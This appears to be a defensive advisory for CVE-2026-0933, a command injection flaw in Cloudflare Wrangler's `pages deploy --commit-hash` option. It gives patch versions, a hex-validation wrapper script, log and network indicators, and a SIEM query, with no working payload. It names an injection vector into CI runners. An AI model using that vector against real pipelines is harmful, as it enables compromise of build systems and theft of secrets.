CVE-2026-0933
📋 TL;DR
A command injection vulnerability in Wrangler's `pages deploy` command allows attackers who control the `--commit-hash` parameter to execute arbitrary shell commands. This primarily affects CI/CD environments where the parameter is populated from external sources. Successful exploitation could lead to complete compromise of the CI runner.
💻 Affected Systems
- Cloudflare Wrangler
📦 What is this software?
Wrangler by Cloudflare
Wrangler by Cloudflare
⚠️ Risk & Real-World Impact
Worst Case
Complete compromise of CI/CD infrastructure, installation of persistent backdoors, exfiltration of sensitive data and credentials, and modification of build artifacts.
Likely Case
Limited command execution in CI environments where commit-hash values come from untrusted sources, potentially exposing environment variables and build secrets.
If Mitigated
No impact if proper input validation is implemented or if commit-hash values are controlled and validated.
🎯 Exploit Status
Exploitation requires control over the --commit-hash parameter, typically through CI/CD pipeline manipulation or untrusted input sources.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: Wrangler v4.59.1+ or v3.114.17+
Vendor Advisory: https://github.com/cloudflare/workers-sdk
Restart Required: No
Instructions:
1. Check current Wrangler version with `wrangler --version`. 2. For v4: upgrade to v4.59.1+ using `npm update -g wrangler`. 3. For v3: upgrade to v3.114.17+ using `npm update -g wrangler`. 4. For v2: migrate to supported v3 or v4 version.
🔧 Temporary Workarounds
Input validation wrapper
allCreate a wrapper script that validates commit-hash input before passing to wrangler
#!/bin/bash
# Validate commit hash contains only hex characters
if [[ ! $1 =~ ^[0-9a-f]+$ ]]; then
echo "Invalid commit hash"
exit 1
fi
wrangler pages deploy --commit-hash "$1"
🧯 If You Can't Patch
- Remove or restrict use of --commit-hash parameter in CI/CD pipelines
- Implement strict input validation for commit-hash values from external sources
🔍 How to Verify
Check if Vulnerable:
Check if using affected Wrangler version with `wrangler --version` and if using `pages deploy` with `--commit-hash` parameter.Check Version:
wrangler --versionVerify Fix Applied:
Verify upgraded to patched version with `wrangler --version` and ensure version is v4.59.1+ or v3.114.17+.📡 Detection & Monitoring
Log Indicators:
- Unusual shell commands in CI/CD logs following wrangler pages deploy execution
- Multiple failed wrangler deploy attempts with unusual commit-hash values
Network Indicators:
- Unexpected outbound connections from CI runners following wrangler execution
SIEM Query:
process.name:"wrangler" AND command_line:"pages deploy" AND command_line:"--commit-hash"